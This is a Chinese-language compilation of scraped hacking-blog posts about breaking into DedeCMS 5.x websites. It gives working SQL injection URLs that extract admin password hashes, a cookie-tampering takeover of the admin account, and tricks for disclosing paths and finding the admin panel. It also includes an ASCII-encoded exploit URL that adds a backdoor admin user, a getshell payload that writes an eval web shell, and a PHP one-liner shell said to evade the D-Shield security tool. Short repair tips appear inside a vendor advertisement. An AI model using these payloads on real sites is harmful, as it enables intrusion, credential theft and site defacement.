http://www.moonsec.com/post-13.html (首发)dedecms 5.7 最新漏洞(绝非网上公布的)
漏洞成功需要条件:
1. php magic_quotes_gpc=off
2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。
怎么判断是否存在漏洞:
先打开www.xxx.com/plus/guestbook.php 可以看到别人的留言,
然后鼠标放在 [回复/编辑] 上 可以看到别人留言的ID。那么记下ID
访问:www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=90sec’&id=存在的留言ID
提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 90sec’ 如果变成了 那么证明漏洞无法利用应为他开启了 php magic_quotes_gpc=off
如果没有修改成功,那留言ID的内容还是以前的 那就证明漏洞可以利用。
那么再次访问 www.xxx.com/plus/guestbook.php?action=admin&job=editok&id=存在的留言ID&msg=’,msg=user(),email=’
然后返回,那条留言ID的内容就直接修改成了mysql 的user().
大概利用就是这样,大家有兴趣的多研究下!!
http://www.freebuf.com/sectool/27206.html
/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@\\%27%20/!50000union//!50000select/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+%23@__admin%20limit+0,1),5,6,7,8,9%23@\\%27+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294
dedecms 通杀全版本漏洞 任意修改管理员密码
时间:2018-01-22 作者:sineadm 分类:网站漏洞 阅读:320次
DEDECMS 5.7最新版本,包括之前的5.6、5.5版本都受该漏洞的影响,织梦exploit算是
网站漏洞里较高级别的漏洞了,许多企业网站,个人网站,都用的dedecms开发与设计,2018
年1月份被爆出可以任意修改管理员以及用户的密码漏洞,可导致网站后台被攻击者登陆,进
而上传网站木马来进一步的获取网站的管理权限,修改并篡改网站的首页。
dedecms最新漏洞详情
该漏洞涉及到前台member用户密码可以任意修改,以及任意用户空密码登陆,织梦后台管理员
密码任意修改的漏洞。member前台用户密码修改主要是通过dedecms的用户安全机制问题,当
用户登陆的时候会记录用户的cookies,通过cookies可以绕过安全机制,直接登陆用户的控制面
板。Sine安全公司是一家专注于:网站安全、服务器安全、网站安全检测、网站漏洞修复,渗透测
试,安全服务于一体的网络安全服务提供商。
那么后台的管理员账号密码是怎么被任意修改的呢?具体漏洞利用是根据前台的admin账号的安
全机制来实现的,前台admin跟后台管理员的账号同是admin的时候,就可以触发该漏洞。我们
来操作一下:前台注册一个账号:名称随便,主要是为了获取admin的cookies值,以便可以前台
登陆admin账号。注册并登陆刚才申请的账号sine,并访问 http://www/member/index.php?uid=sine
右键查看源码查找last_vid_ckMD5这个的值是多少。并修改DedeUserID值为0000001,刷新访问
该页面http://www/member/index.php,如下图所示:
显示已登陆了 admin的账号了,登陆以后我们来改一下admin的账号密码。前台改的admin
密码,也会同步到后台的admin管理员账号上。那么我们就可以用刚修改的密码直接登陆网
站后台,进行提权即可。
如何修复dedecms漏洞?
我们在对dedecms的源代码进行安全分析的时候,发现member会员目录下的edit_baseinfo.php
文件存在安全漏洞,也就是说前台admin账号密码修改后,会同步修改掉后台的管理员账号
admin的密码,也就是因为这个漏洞导致网站可以被攻击者入侵,并篡改网站首页。怎样修改该
网站漏洞呢?Sine安全公司是一家专注于:网站安全、服务器安全、网站安全检测、网站漏洞修
复,渗透测试,安全服务于一体的网络安全服务提供商。
注释掉member会员目录下的index.php 第160行到165行的代码,如下图1所示:还有会员目录下
的resetpassword.php这个代码里的第80-85行代码进行注释,可以修复DEDECMS的漏洞。
目前dede官方暂时没有发布最新的漏洞补丁,请各大网站管理员按照上述的方法进行修复,最好
可以改掉管理员的账号admin,改为其他名字,也可以防止被漏洞利用。
https://blog.csdn.net/what_happened/article/details/53609099
http://www.moonsec.com/post-138.html dedecms最新版本修改任意管理员漏洞【配图】加用户spider
织梦找后台
dedecms爆后台文件技巧
首页 » 渗透测试 » dedecms爆后台文件技巧
评论↓
隐藏
分享
关灯
小
中
大
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
员帐号,新版本的就直接转向了后台.
2.include/dialog/config.php会爆出后台管理路径
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
到根目录去.不过这些版本的访问地址有些不同.
地址为require/dialog/select_soft.php?activepath=/././././././././
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
存在相同问题的文件还有
include\dialog\select_images.php
include\dialog\select_media.php
include\dialog\select_templets.php
http://www.2cto.com/Article/201304/201778.html
http://www.moonsec.com/post-823.html dedecms window爆破找后台
原文地址:织梦dedecms查找后台的技巧。作者:涅少爷
今天比较郁闷,后台账号密码倒是搞了不少,找后台地址花了我很长的时间,各种工具各种扫不到,于是收集了下面的一下方法和技巧,留着以后用。
有时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址。这样让大家很是蛋疼,下面我来介绍几种织梦系统找后台的方法。
这个时候大家可以尝试下在地址后面加上:
织梦dedecms查找后台的技巧。
1、/include/dialog/select_media.php?f=form1.murl
织梦dedecms查找后台的技巧。
2、/include/dialog/select_soft.php
织梦dedecms查找后台的技巧。
3.使用mysql_error 信息去试试
/data/mysql_error_trace.inc —— 建议使用该方法屡试屡爽
织梦dedecms查找后台的技巧。
但不一定通杀。。
织梦dedecms查找后台的技巧。
/robots.txt
/data/admin/ver.txt
DedeCmsV5.1 FreeSP1访问
织梦dedecms查找后台的技巧。
http://127.0.0.1/include/dialog/ … =/include/FCKeditor
织梦dedecms查找后台的技巧。
可以跳转目录跳转到根目录的方法为:
织梦dedecms查找后台的技巧。
http://127.0.0.1/include/dialog/ … h=/././././././././
织梦dedecms查找后台的技巧。
而且DEDECMS在访问不存在的目录时会报错如访问
织梦dedecms查找后台的技巧。
http://127.0.0.1/include/dialog/ … t0pst0pst0pst0pst0p
织梦dedecms查找后台的技巧。
DedeCMS V5.3.1和最新的DedeCMS V5.5正式版,发现这两个版本已经进行了处理,而且只会列出目录和一些允许显示的文件,PHP是不能显示了,爆路径是一样通用的构造
织梦dedecms查找后台的技巧。
http://127.0.0.1/include/dialog/ … =/include/FCKeditor
话说不是找不到后台就是遇到狗,现在很多站都有狗了,看来我得学习哈怎么杀狗。
原文发布在成都seo博客:http://www.xinduseo.com 原文地址:http://www.xinduseo.com/sec/zhaodedecms.html
http://tieba.baidu.com/p/4201272365?red_tag=d1485202150
dedecms找不到后台思路
http://www.cnblogs.com/str0ng/articles/3217028.html
dedecms 最新版本修改任意管理员漏洞 0day
测试版本 :
EXP:
添加后台登录用户spider密码admin
测试报告;
提示:Safe Alert: Request Error step 2!
即表示成功! 找后台是鸡肋
附查找后台的方法:
如果这样都查不到几乎没辙了:
/data/mysql_error_trace.inc
/data/mysqli_error_trace.inc
如果查不到,可以利用搜索引擎(尤其是搜狗搜索),搜索不到基本上没辙了(当然您可以利用暴力、弱口令爆破,这个不在本文讨论之中)。
site:domain.com 织梦内容管理系统
site:domain.com 用户名: 密 码: 验证码: 看不清?
https://images.seebug.org/contribute/5a8dc3af-25df-45f6-829c-064fa76de9d3-QQ%E6%88%AA%E5%9B%BE20150921095929.png
又或者直接搜索后台(主要针对搜狗搜索):
DEDECMS V53_GBK
DEDECMS V55_GBK
DEDECMS V56_GBK
DEDECMS V57_GBK_SP1
UTF8版本:(可能不全)
DEDECMS V53_UTF8
DEDECMS V55_UTF8
DEDECMS V56_UTF8
DEDECMS V57_UTF8_SP1
发一个过D盾的 php一句话 密码qing520
<?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["qing520"]); ?>
此漏洞无视gpc转义,过80sec注入防御。补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。include/dedesql.class.php
if(isset($GLOBALS['arrs1']))
{
$v1 = $v2 = '';
for($i=0;isset($arrs1[$i]);$i++)
{
$v1 .= chr($arrs1[$i]);
}
for($i=0;isset($arrs2[$i]);$i++)
{
$v2 .= chr($arrs2[$i]); //解码ascii
}
$GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+
}
function SetQuery($sql)
{
$prefix="#@__";
$sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。
$this->queryString = $sql;
}
另外说下绕过80sec防注入的方法。
同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2
而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。plus/download.php
<pre>else if($open==1)
{
$id = isset($id) && is_numeric($id) ? $id : 0;
$link = base64_decode(urldecode($link));
$hash = md5($link);
//这里的#@_是可以控制的
$rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' ");
if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query);
}
header("location:$link");
exit();
}
构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #
完整SQL语句:
UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash'
EXP:
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
如果不出问题,后台登录用户spider密码admin
漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。
如果找不到后台,参见以前修改数据库直接拿SHELL的方法
UPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'',''<!--?php eval($_POST[spider]);?-->'');{/dede:php}' WHERE `aid` =1 LIMIT 1 ;
getshell:
&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
会在plus目录生成 x.php 密码 m http://127.0.0.1/plus/x.php update成功后还要访问下 /plus/mytag_js.php?aid=1
目前官方没有发布补丁 临时修复建议 删除或者改名 /plus/download.php 哎 每次出事都是/plus/目录
下面盘点这段时间爆出的dede漏洞
DEDECMS重装漏洞,Dedecms在安装后会把安装文件/install/index.php备份成/install/index.php.bak,这个在apache下面是会解析成PHP执行的。 个人认为是apache的漏洞而已 而且都存在很久了 尼玛.bak就.bak后缀呗 尼玛偏偏当php执行 这个也算是解析漏洞。dede躺枪了 …
https://blog.csdn.net/what_happened/article/details/53609099 dedecms install.php 远程getshell
扫一扫
1033
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
